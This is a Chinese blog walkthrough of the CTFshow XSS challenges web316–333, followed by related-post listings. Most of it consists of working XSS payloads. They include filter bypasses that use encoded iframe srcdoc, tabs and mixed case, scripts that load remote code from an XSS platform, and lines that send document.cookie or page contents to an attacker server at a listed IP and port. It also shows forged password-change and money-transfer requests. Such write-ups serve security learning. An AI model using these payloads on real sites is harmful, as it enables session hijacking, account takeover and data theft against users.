CTFshow——XSS

最新推荐文章于 2024-03-10 18:10:30 发布
最新推荐文章于 2024-03-10 18:10:30 发布
阅读量592 收藏 1
点赞数 3
分类专栏: XSS
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114097690
版权

浅谈XSS在CTF中的一些考点

文章目录

web316

利用xss平台里的代码进行攻击: https://xss.pt/xss.php

<sCRiPt sRC=//xss.pt/kUIB></sCrIpT>

web317——过滤了script

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss.pt/kUIB';>

web318——过滤了img

<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&#60;&#115;&#67;&#82;&#105;&#80;&#116;&#32;&#115;&#82;&#67;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#46;&#112;&#116;&#47;&#107;&#85;&#73;&#66;&#34;&#62;&#60;&#47;&#115;&#67;&#114;&#73;&#112;&#84;&#62;>

web319——

<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&#60;&#115;&#67;&#82;&#105;&#80;&#116;&#32;&#115;&#82;&#67;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#46;&#112;&#116;&#47;&#107;&#85;&#73;&#66;&#34;&#62;&#60;&#47;&#115;&#67;&#114;&#73;&#112;&#84;&#62;>

web320、321、322——过滤空格

可用tab绕过

<iframe	WIDTH=0	HEIGHT=0	srcdoc=。。。。。。。。。。&#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3A;&#x2F;&#x2F;&#x78;&#x73;&#x73;&#x2E;&#x70;&#x74;&#x2F;&#x6B;&#x55;&#x49;&#x42;&#x22;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E;>

web323、325、326——

据说过滤了xss平台的payload…
通过onload事件在页面载入完成后立即触发代码。
用VPS接收,在VPS上开启监听nc -lvp port,一段时间后bot会自动访问,然后就能获得flag:

<body/onload=document.location='http://VPS:port/cookie.php?cookie='+document.cookie;>

web327

存储型XSS
收件人要填admin,然后在输入框都填上payload(毕竟不知道哪个框生效),可以发送到XSS平台,也可用VPS接收。

web328

看见注册、登录这功能,猜测要获取admin的cookie然后进入用户管理界面。
直接在注册时写上payload

<script>window.open('http://VSP:Port'+document.cookie)</script>

盗取了admin的cookie后修改cookie即可

web329

群主设置了把cookie发送给你之前就让它失效了,盗用cookie行不通。

那就直接获取页面元素的内容,然后发送返回给我们。参考一下大佬们是怎么获取的:

feng师傅的方法:

<script>window.open('http://82.157.22.248:2333/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

通过document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML获取到指定的内容,

getElementsByClassName:获取所有指定类名的元素

还有innerHTML和outerHTML的区别
1)innerHTML:
  从对象的起始位置到终止位置的全部内容,不包括Html标签。
2)outerHTML:
  除了包含innerHTML的全部内容外, 还包含对象标签本身。

在这里插入图片描述

web330

继续尝试获取密码,但得到的是*******,那么flag放在别的地方。注意到多了个修改密码的功能,估计是要修改密码了

预期解:修改密码,地址是127.0.0.1

<script>window.open("http://127.0.0.1/api/change.php?p=a")</script>

非预期:获取页面源码,用document.querySelector获取,获取的类是div.layui-container,

获取文档中 id=“demo” 的元素:
document.querySelector("#demo");

<script>window.open('http://82.157.22.248:2333/'+document.querySelector('#top > div.layui-container').textContent)</script>

web331

修改密码的方式变成了POST请求,可以尝试用JQuery来发送请求:

<script>$.post("http://api/change.php",{p:123123},"json");</script>

非预期还是获取页面信息:

<script>window.open('http://82.157.22.248:2333/'+document.querySelector('#top > div.layui-container').textContent)</script>

web332

支付逻辑漏洞,没有对用户输入进行过滤,假设我们输入负数,交易成功就会给自己加钱,负负得正嘛。
所以直接转账,金额是-9999即可

web333

利用admin账户给自己转账:
注意:注册的账号,其密码一定不少于6位,不然是买不到flag的

<script>$.post("http://127.0.0.1/api/amount.php",{'u':'ad' ,'a':10000},"json");</script>
D.MIND
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
机器学习实现web攻击检测——XSS、SQL注入、Webshell检测.zip
最新发布
05-06
机器学习实现web攻击检测——XSS、SQL注入、Webshell检测.zip
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 3767
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
CTFSHOW-XSS
byname1的博客
03-10 948
说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
ctfshow-web[XSS]
m0_72898152的博客
02-04 772
ctfshow
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 654
2023/05/07 ctfshow刷题 web316-326 反射型XSS
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1364
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
Xss Scan tool
05-25
Xss Scan,一款可以安装在burpsuite的插件,用于xss漏洞的扫描。 专业 好用
ctfshow之xss(有图易操作)
qq_50589021的博客
08-14 616
XSS平台 document.cookie 获取饼干的js代码 推荐xss平台:http://xsscom.com/ , https://xss.pt/ JavaScript的 document.cookie 将以字符串的方式返回所有的cookie,类型格式: cookie1=value; cookie2=value; cookie3=value; 2021-08-06 web316(反射型) 利用xss平台里的代码进行攻击: http://xsscom.com/ 建造完项目以后,复制代码: <sc
ctfshowXSS
njh18790816639的博客
05-19 308
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
ctfshow—XSS
cosmoslin的博客
02-05 908
web 316(反射型) 测试<script>alert(1)</script>,无过滤 在服务器上开启监听 python3 -m http.server 39543 外带数据: <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx.xx:39543/"+docu
CTFSHOW xss
羽的博客
12-28 9171
web316 xss平台 https://xss.pt/xss.php 创建项目 选择默认模块 一直下一步,然后随便那个代码放到题目输入框中 再刷新下题目 最后看下项目 结束
[CTFSHOW]XSS入门(佛系记录)
Y4tacker的博客
12-22 3091
web316 http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E web317-319 http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28t
ctfshow-web-xss
qq_60905276的博客
01-22 499
1.web316 直接简单的测试一下 <script>alert("hack")</script> 发现并没有防护,直接开整。 (做xss-labs-master魔怔了,愣是不知道flag在哪,看别人才知道flag在cookie那里) 好,我们开个项目直接做。 轻松解决。 网站在下面XSS Platformhttp://xsscom.com/ 2.web317 又是一波测试,发现它把<script>标签过滤了。 那我们就用svg的,..
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 4158
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
CTFShow Xss
paidx0
08-12 1265
CTFShow Xss(学习) 简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export xss 分类:(三类) 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺
ctf show317 ceye
08-27
很抱歉,根据提供的引用内容,没有提到关于"ctf show317 ceye"的信息。请提供更详细的信息,我会尽力帮助您。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow XSS漏洞web316-328](https://blog.csdn.net/m0_62584974/article/details/124029430)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值